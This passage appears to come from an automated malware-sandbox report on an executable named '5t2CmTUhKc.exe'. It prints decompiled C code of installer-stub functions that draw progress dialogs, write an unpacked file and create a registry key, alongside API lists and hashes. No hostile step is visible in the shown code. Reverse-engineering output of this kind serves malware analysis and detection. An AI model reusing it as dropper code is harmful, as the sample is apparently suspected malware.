                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: "C:\Users\user\Desktop\5t2CmTUhKc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-4039964973
                                                                                                            • Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                            • Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
                                                                                                            • Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                            • Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                            0x00403f91
                                                                                                            0x00404025
                                                                                                            0x00000000
                                                                                                            0x00404025
                                                                                                            0x00403fa2
                                                                                                            0x00403fa6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403fac
                                                                                                            0x00403fb5
                                                                                                            0x00403fb8
                                                                                                            0x00403fb8
                                                                                                            0x00403fbe
                                                                                                            0x00403fc4
                                                                                                            0x00403fc4
                                                                                                            0x00403fd0
                                                                                                            0x00403fd6
                                                                                                            0x00403fdd
                                                                                                            0x00403fe0
                                                                                                            0x00403fe3
                                                                                                            0x00403fe5
                                                                                                            0x00403fe5
                                                                                                            0x00403fed
                                                                                                            0x00403ff3
                                                                                                            0x00403ff3
                                                                                                            0x00403ffd
                                                                                                            0x00404002
                                                                                                            0x00404005
                                                                                                            0x0040400a
                                                                                                            0x0040400d
                                                                                                            0x0040400d
                                                                                                            0x0040401d
                                                                                                            0x0040401d
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                            • Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
                                                                                                            • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                            • Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                            0x0040267c
                                                                                                            0x0040267e
                                                                                                            0x0040268a
                                                                                                            0x0040268d
                                                                                                            0x00402697
                                                                                                            0x0040269b
                                                                                                            0x0040269b
                                                                                                            0x004026a1
                                                                                                            0x004026ae
                                                                                                            0x004026b6
                                                                                                            0x004026b9
                                                                                                            0x004026bf
                                                                                                            0x004026cd
                                                                                                            0x004026d2
                                                                                                            0x004026d6
                                                                                                            0x004026d9
                                                                                                            0x004026e2
                                                                                                            0x004026ee
                                                                                                            0x004026f2
                                                                                                            0x004026f5
                                                                                                            0x004026ff
                                                                                                            0x0040271e
                                                                                                            0x00402706
                                                                                                            0x0040270b
                                                                                                            0x00402713
                                                                                                            0x00402716
                                                                                                            0x0040271b
                                                                                                            0x0040271b
                                                                                                            0x00402725
                                                                                                            0x00402725
                                                                                                            0x00402737
                                                                                                            0x0040273e
                                                                                                            0x00402750
                                                                                                            0x00402750
                                                                                                            0x00402756
                                                                                                            0x00402756
                                                                                                            0x00402761
                                                                                                            0x00402762
                                                                                                            0x00402766
                                                                                                            0x0040276a
                                                                                                            0x00402770
                                                                                                            0x00402770
                                                                                                            0x00402777
                                                                                                            0x00402164
                                                                                                            0x0040288e
                                                                                                            0x0040289a

                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                            • GlobalFree.KERNEL32 ref: 00402725
                                                                                                            • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                            • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                            • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3294113728-0
                                                                                                            • Opcode ID: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                                            • Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
                                                                                                            • Opcode Fuzzy Hash: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                                            • Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00404F04(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B88(0, _t39, 0x41fc78, 0x41fc78, _a4);
					}
					_t26 = lstrlenA(0x41fc78);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc78)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc78, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                            0x00404f0a
                                                                                                            0x00404f16
                                                                                                            0x00404f19
                                                                                                            0x00404f1f
                                                                                                            0x00404f2b
                                                                                                            0x00404f2e
                                                                                                            0x00404f31
                                                                                                            0x00404f37
                                                                                                            0x00404f37
                                                                                                            0x00404f3d
                                                                                                            0x00404f45
                                                                                                            0x00404f48
                                                                                                            0x00404f65
                                                                                                            0x00404f69
                                                                                                            0x00404f72
                                                                                                            0x00404f72
                                                                                                            0x00404f7c
                                                                                                            0x00404f85
                                                                                                            0x00404f91
                                                                                                            0x00404f98
                                                                                                            0x00404f9c
                                                                                                            0x00404f9f
                                                                                                            0x00404fb2
                                                                                                            0x00404fc0
                                                                                                            0x00404fc0
                                                                                                            0x00404fc4
                                                                                                            0x00404fc6
                                                                                                            0x00404fc9
                                                                                                            0x00000000
                                                                                                            0x00404fc9
                                                                                                            0x00404f4a
                                                                                                            0x00404f52
                                                                                                            0x00404f5a
                                                                                                            0x00404f60
                                                                                                            0x00000000
                                                                                                            0x00404f60
                                                                                                            0x00404f5a
                                                                                                            0x00404f48
                                                                                                            0x00404fd3

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                            • lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                            • lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                            • SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                                            • Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
                                                                                                            • Opcode Fuzzy Hash: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                                            • Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				__eflags =  *0x41704c; // 0x0
				if(__eflags != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                            0x00402bdf
                                                                                                            0x00402be1
                                                                                                            0x00402be8
                                                                                                            0x00402beb
                                                                                                            0x00402beb
                                                                                                            0x00402bf1
                                                                                                            0x00000000
                                                                                                            0x00402bf1
                                                                                                            0x00402bf9
                                                                                                            0x00402bff
                                                                                                            0x00000000
                                                                                                            0x00402c02
                                                                                                            0x00402c09
                                                                                                            0x00402c0f
                                                                                                            0x00402c15
                                                                                                            0x00402c17
                                                                                                            0x00402c1d
                                                                                                            0x00402c5b
                                                                                                            0x00402c64
                                                                                                            0x00000000
                                                                                                            0x00402c69
                                                                                                            0x00402c1f
                                                                                                            0x00402c26
                                                                                                            0x00402c37
                                                                                                            0x00000000
                                                                                                            0x00402c45
                                                                                                            0x00402c26
                                                                                                            0x00402c71

                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402BEB
                                                                                                            • GetTickCount.KERNEL32 ref: 00402C09
                                                                                                            • wsprintfA.USER32 ref: 00402C37
                                                                                                              • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                              • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                              • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                              • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                              • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                              • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                              • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C69
                                                                                                              • Part of subcall function 00402BB7: MulDiv.KERNEL32(00008000,00000064,?), ref: 00402BCC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                            • Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
                                                                                                            • Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                            • Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                            0x004047e1
                                                                                                            0x004047ee
                                                                                                            0x004047f4
                                                                                                            0x00404832
                                                                                                            0x00404832
                                                                                                            0x00404841
                                                                                                            0x00404848
                                                                                                            0x00000000
                                                                                                            0x0040484a
                                                                                                            0x004047f6
                                                                                                            0x00404805
                                                                                                            0x0040480d
                                                                                                            0x00404810
                                                                                                            0x00404822
                                                                                                            0x00404828
                                                                                                            0x0040482f
                                                                                                            0x00000000
                                                                                                            0x0040482f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047EE
                                                                                                            • GetMessagePos.USER32 ref: 004047F6
                                                                                                            • ScreenToClient.USER32 ref: 00404810
                                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404822
                                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404848
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                            • Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
                                                                                                            • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                            • Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                            0x00402b48
                                                                                                            0x00402b56
                                                                                                            0x00402b5c
                                                                                                            0x00402b5c
                                                                                                            0x00402b6a
                                                                                                            0x00402b6c
                                                                                                            0x00402b78
                                                                                                            0x00402b7d
                                                                                                            0x00402b7f
                                                                                                            0x00402b7f
                                                                                                            0x00402b8a
                                                                                                            0x00402b9a
                                                                                                            0x00402bac
                                                                                                            0x00402bac
                                                                                                            0x00402bb4

                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                            • wsprintfA.USER32 ref: 00402B8A
                                                                                                            • SetWindowTextA.USER32(?,?), ref: 00402B9A
                                                                                                            • SetDlgItemTextA.USER32 ref: 00402BAC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                            • Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
                                                                                                            • Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                            • Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402303, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a370) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F18(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}










                                                                                                            0x00402304
                                                                                                            0x00402309
                                                                                                            0x00402313
                                                                                                            0x0040231d
                                                                                                            0x00402320
                                                                                                            0x00402330
                                                                                                            0x0040233a
                                                                                                            0x00402341
                                                                                                            0x00402349
                                                                                                            0x00402357
                                                                                                            0x0040235b
                                                                                                            0x00402366
                                                                                                            0x00402366
                                                                                                            0x0040236a
                                                                                                            0x0040236e
                                                                                                            0x00402374
                                                                                                            0x00402379
                                                                                                            0x00402379
                                                                                                            0x0040237d
                                                                                                            0x00402389
                                                                                                            0x00402389
                                                                                                            0x004023a2
                                                                                                            0x004023a4
                                                                                                            0x004023a4
                                                                                                            0x004023a7
                                                                                                            0x0040247d
                                                                                                            0x0040247d
                                                                                                            0x0040288e
                                                                                                            0x0040289a

                                                                                                            APIs
                                                                                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse5FEA.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
